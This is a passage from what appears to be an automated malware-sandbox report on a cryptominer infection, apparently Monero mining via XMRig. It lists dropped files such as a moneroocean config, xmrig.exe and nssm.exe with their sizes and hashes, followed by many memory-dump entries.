e09febd2ab7f643e230292f85757a779ff5de3ba7673405c228f213de4040516

SHA512
98c52f06707cfa67cae135a64fcf1588155e956abae02ae352c657f8f58960f63ff6cabc93fc31d65398c037e828fab5fbbd2ba2bffd9b0261c835afeb2aaac6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
56609c93f56a96b8c7ccd0c9fc736d7d

SHA1
206101e16d7f5fc16a6e1875a688128ddc77af0e

SHA256
a55c36c53572ac839717e2b02d8c7e0ec5558fb6b3183ba49e4790e990b82e83

SHA512
4e890c253a7ad86ce4d65698532f494550035ca6487fc74dcee7edaee399d048240492661f556724e66d6b7b8c7f53b799502a1185f6c677cad05b62f73e92f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87014e8e86f8cf91afa6847fa680b41c

SHA1
a07c14a16fc506533f3229d521049990698bf1ab

SHA256
a74380b8226f0dd547c49ebcc988410ea776ce00213a7f3a69857301714866b1

SHA512
72510e063dbfc0c095d9c4cf15e6015e2304207c946d6c26787af8c54ec3fd4fee602d316212167639756afaf6682d735591b27b6a3be8ef4134e0161d5354be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa51b3701b3a5765d6d6bffb29dd3fe8

SHA1
12f3fa39f18ec66f0120b91de96f16fe0962e7d5

SHA256
e9a8ae186a996fa86822bbae819ce6c59992651b067449fce8b905c8d21485e1

SHA512
d305ca42b931d0944c9c800dce65854583a5fd330fbf0834d4676ad11ef56517d87169705a04de84aec8582231246ec7e51e0c0b75b7715f27fafd91d7b913e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1327a8da9616abb8867bd03466787584

SHA1
0548ee2776ddd373ef575add5d75119f836ab29e

SHA256
a8ce2fcef9f816f070d0245a500a88f49aeebaacd14b7b424dabb5e4cff3d59b

SHA512
19c2a9b840e13b15a0bb24e139ed197fef7c8f7d3ede7eef1c11f9569ab7dcc8128624474304f95456b7f8e906cc31b3eac19f18fc9f39480367958b4360e581

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ecf2f2c2b4293aca091a6b61b8ec34a7

SHA1
06d9fda066eb643974025957273aa55ec3927a0b

SHA256
88842d93225200bd61ef1d68fed5f8c910dfd0217a59f0be9322918bab54232d

SHA512
d664aee71f6dae4d81b0141194b21a6ca5023e5b6e969c95ffc9c0a71ad7b6e1e773895bb66a9399b39982d6f5fd7974b0d5a566fc11224f038032c78dfc5716

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12ff85d31d9e76455b77e6658cb06bf0

SHA1
45788e71d4a7fe9fd70b2c0e9494174b01f385eb

SHA256
1c60ff7821e36304d7b4bcdd351a10da3685e9376775d8599f6d6103b688a056

SHA512
fcc4084ab70e49821a3095eeac1ef85cf02c73fdb787047f9f6b345132f069c566581921fac98fab5ddec1a550c266304cce186e1d46957946b6f66dba764d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a5a5d4b716f2de614f85c418a88aacb

SHA1
a09c5a404306c5056119af565144dfba9e4f8c8d

SHA256
256aab870f7eb804c011f4a40ee4e8c920075bf24861e639ff5968fb2b9b808d

SHA512
e9a784c44fe6d46836ff4c6849949fe3322cd59457eb790bf8bf637070677ec679d825bb8cac54e2060b4438428fd8b53ef6de9d75d9365b9020e18182121a2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4c6fea12e29561f3e20f74bde74d88a

SHA1
79303cdd56db3a417c529f3f1c7449e95294c3e4

SHA256
848bf0c5a62c1003399cad6f3235771fbd16c3228b4ab5467cf06286f2cf794b

SHA512
b0560fa71cea820afd8bffa0a379169463b7c6740ba57e3f79b2489a2959f78c1b012a760267ac3a3837e76a76dbb8ee2f4da687352987f1407d33ffd036333c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8a424e81b5a6078deff05e153c04a0ee

SHA1
bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

SHA256
79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

SHA512
aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71de3d4e6a902c41e5d87b031a5a1910

SHA1
38da8e3af858eb6ad51af0aca573ed73c244cb21

SHA256
19c786a0d1be5f808940dfb0bfcdf3e78a1e4881cb326fabe044b9c7c2970466

SHA512
c3811686eead6874ad81483349e693e1ba89ef4c38d001cfdc5e49c5085d13649940a623a2e3cfd12d3ff887e6d12c11b3a832b09e00577d623cf4d7c03f7554

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vkf4v51x.in2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6E79.tmp.bat

Filesize
14KB

MD5
012a668bd1043d6b0a4bcd03d02ded41

SHA1
8595831d19a06d5ad38cb38b793eb1bdcc16b816

SHA256
57375e5d331ed567ca2da98b126ac585ff7829d15c31ad98eb452339e3ba1d05

SHA512
e43947f10872db119daa4f28c70046941602831a8e8a871ccad45f8712a972d76b31a05282de7f4bc99d2e23fe40ef9dceaef3ea84b7c6532b85fee920269792

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d9bba02e1083a244af764a5fc9aa0fd3

SHA1
724992df977650f0b044c55c9fb69cf6a35a8587

SHA256
71196b56fa619f8bdc3b437f92c8a3e7ec624e95808e79038857a20f95aa3a39

SHA512
b25653630f58e1f4b02a45df64e540d9be6c9cf92e78048bfae57bc52dbfef0c1b36e5067067692d8a83e291dfabb3eff775e3c42ab8fc25204710c9211f7360

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
b0b951bec35680f78561e37b80e74e4d

SHA1
ae511ad2916e5fc65ac73d8fe0bb4a4187810c89

SHA256
1dcc235810b07457cbb6372d1c9cfae85f15d1d74676a7921fc752d98117a453

SHA512
ca7f585ce26dae544c563af5f3c0c114360c894ac01010263a319d77e49d28fae81da2243174bf69a22c531cc9d5eb332ee4422e3027eae96545ff8e74688fbb

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/2992-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-234-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-253-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-252-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-251-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-250-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-249-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-248-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-247-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-246-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-245-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-188-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-189-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-190-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-244-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-243-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-242-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-241-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-240-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-239-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-238-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-237-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-236-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-235-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-204-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-205-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-206-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-207-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-208-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-209-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-211-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-212-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-213-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-214-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-215-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-232-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-229-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-230-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2992-231-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3032-192-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-193-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-203-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-197-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-198-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-199-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-200-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-201-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-202-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3032-191-0x000001D9495D0000-0x000001D9495D1000-memory.dmp

Filesize
4KB

Download
memory/3732-65-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3732-64-0x0000000001790000-0x00000000017B0000-memory.dmp

Filesize
128KB

Download
memory/4516-9-0x0000020EA1E30000-0x0000020EA1E52000-memory.dmp

Filesize
136KB

Download
memory/4516-0-0x00007FF9A5473000-0x00007FF9A5475000-memory.dmp

Filesize
8KB

Download
memory/4516-10-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp

Filesize
10.8MB

Download
memory/4516-11-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp

Filesize
10.8MB

Download
memory/4516-12-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp

Filesize
10.8MB

Download
memory/4516-13-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp

Filesize
10.8MB

Download
memory/4516-14-0x00007FF9A5470000-0x00007FF9A5F32000-memory.dmp

Filesize
10.8MB

Download
memory/4620-39-0x0000020F45D60000-0x0000020F45D6A000-memory.dmp

Filesize
40KB

Download
memory/4620-40-0x0000020F46150000-0x0000020F46162000-memory.dmp

Filesize
72KB

Download